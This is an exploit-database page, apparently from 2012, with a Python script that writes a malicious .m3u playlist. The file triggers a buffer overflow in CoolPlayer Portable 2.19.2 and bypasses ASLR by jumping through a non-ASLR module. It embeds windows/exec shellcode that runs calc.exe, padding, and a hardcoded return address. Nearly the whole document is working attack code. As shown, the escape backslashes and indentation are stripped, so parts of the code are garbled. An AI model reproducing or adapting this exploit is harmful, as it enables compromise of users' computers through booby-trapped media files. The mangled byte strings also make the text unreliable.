[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass
# Published : 2012-08-05
# Author :
# Previous Title : Shadow Stream Recorder 3.0.1.7 Buffer Overflow
# Next Title : python-wrapper Untrusted Search Path/Code Execution Vulnerability
# Buffer overflow that bypasses ASLR by using a non-aslr module
# Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit
# Written by Blake patched by pole
# Originally found by Securityxxxpert
print "n====================================="
print "CoolPlayer Portable Buffer Overflow"
print "Tested on Windows Vista (ASLR Bypass)"
print "Written by Blake"
print "Patched by pole"
print "=====================================n"
# 233 bytes for shellcode available
# 227 byte windows/exec shellcode => CMD=calc.exe
shellcode=(
"xdaxc5xbexdaxc6x9axb6xd9x74x24xf4x5dx2bxc9xb1"
"x33x83xc5x04x31x75x13x03xafxd5x78x43xb3x32xf5"
"xacx4bxc3x66x24xaexf2xb4x52xbbxa7x08x10xe9x4b"
"xe2x74x19xdfx86x50x2ex68x2cx87x01x69x80x07xcd"
"xa9x82xfbx0fxfex64xc5xc0xf3x65x02x3cxfbx34xdb"
"x4bxaexa8x68x09x73xc8xbex06xcbxb2xbbxd8xb8x08"
"xc5x08x10x06x8dxb0x1ax40x2exc1xcfx92x12x88x64"
"x60xe0x0bxadxb8x09x3ax91x17x34xf3x1cx69x70x33"
"xffx1cx8ax40x82x26x49x3bx58xa2x4cx9bx2bx14xb5"
"x1axffxc3x3ex10xb4x80x19x34x4bx44x12x40xc0x6b"
"xf5xc1x92x4fxd1x8ax41xf1x40x76x27x0ex92xdex98"
"xaaxd8xccxcdxcdx82x9ax10x5fxb9xe3x13x5fxc2x43"
"x7cx6ex49x0cxfbx6fx98x69xf3x25x81xdbx9cxe3x53"
"x5exc1x13x8ex9cxfcx97x3bx5cxfbx88x49x59x47x0f"
"xa1x13xd8xfaxc5x80xd9x2exa6x47x4axb2x07xe2xea"
"x51x58")
nops = "x90" * 6
buffer = "x41" * (229 - len(shellcode))
eip = "x75x52x46x00" # JMP EBX - coolplayer.exe "x75x52x46x00"
print "[+] Creating malicious file"
try:
file = open("exploit.m3u","w")
file.write(nops + shellcode + buffer + eip)
file.close()
print "[+] File created successfully"
raw_input("[+] Press any key to exit...")
except:
print "[X] Error creating file!"
sys.exit(0)